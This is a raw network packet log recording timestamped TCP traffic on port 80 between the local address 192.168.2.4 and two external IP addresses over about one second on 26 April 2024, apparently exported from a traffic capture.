Apr 26, 2024 10:27:03.716931105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.716969967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717008114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717044115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717072964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.717116117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717123985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.717154026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717197895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.717197895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.717216015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.717268944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.742464066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:03.742561102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:03.742647886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:03.957211018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957257986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957293987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957331896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957369089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957377911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957406998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957442999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957479954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957515955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957524061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957524061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957568884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957570076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957570076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957607031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957624912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957644939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957681894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957691908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957691908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957736969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957751036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957772970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957808971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957818985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957818985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957847118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957885027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957895994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957900047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957938910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957976103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.957983017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.957983017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.958054066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.008039951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008272886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008312941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008353949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008392096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008428097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008483887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008539915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008533955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.008533955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.008579016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008611917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.008619070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.008635044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.008657932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.009093046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.198988914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199018955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199045897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199064016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199090958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199177027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199214935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199214935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199225903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199234962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199295998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199340105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199429035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199449062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199471951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199498892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199512005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199556112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199561119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199604034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199620962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199664116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199758053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199807882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199831963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199875116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199899912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.199949026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.199974060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200021029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200117111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200153112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200164080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200195074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200198889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200238943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200242996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200288057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200315952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200334072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200360060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200377941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200406075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200448990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200450897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200527906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200539112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200573921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200592041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200634956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200674057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200721025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200747013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200792074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200810909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200829029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200858116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200870037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200911999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200930119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.200959921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.200980902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201029062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201092958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201108932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201159954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201160908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201193094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201203108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201237917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201261997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201303005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201308966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201340914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.201342106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.201391935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.274152994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274209976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274250031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274300098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274305105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274358988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274374962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274487019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274528027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274538994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274569035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274605989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274635077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274679899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274717093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274786949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274816990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274843931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.274857998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274897099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274966955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.274977922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.275037050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.275088072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.275099039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.275167942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.275207043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.275212049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.275243998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.275338888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.439752102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.439784050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.439804077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.439831972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.439848900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.439857960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.439893961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.439917088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.439954042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440011978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440033913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440082073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440083981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440128088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440145969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440193892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440196991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440243959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440257072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440274954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440314054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440330029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440361977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440390110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440440893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440449953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440494061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440530062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440547943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440582991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440603018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440632105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440674067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440717936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440721989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440804005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440824032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440831900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440857887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440876961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440881014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440910101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440957069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.440974951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.440994024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441021919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441045046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441065073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441097975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441117048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441142082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441159964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441203117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441217899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441262007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441297054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441340923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441344023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441385031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441421032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441468954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441504002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441550970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441556931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441613913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441627026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441632032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441658020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441685915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441699982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441745996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441756964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441802979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441803932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441848993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441884041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.441934109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.441970110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442012072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442018986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442059994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442109108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442142010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442163944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442182064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442184925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442234039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442269087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442274094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442277908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442342043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442349911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442384958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442405939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442451954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442456961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442495108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442497015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442528009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442539930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442572117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442591906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442636013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442642927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442701101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442734003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442756891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442768097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442814112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442816973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442862988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442939997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.442990065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.442991972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443037033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443054914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443089008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443106890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443136930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443141937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443183899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443237066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443279982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443285942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443325996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443361044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443411112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443413019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443480968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443490982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443535089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443569899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443622112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443679094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443705082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443728924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443744898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443799973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443845034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443886995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443906069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.443938971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443958998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.443980932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444027901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.444048882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444097996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.444185019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444228888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444233894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.444272995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.444277048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444319963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.444394112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.444442034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.539922953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.539956093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.539989948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540009975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540059090 CEST	80	49734	176.97.76.106	192.168.2.4
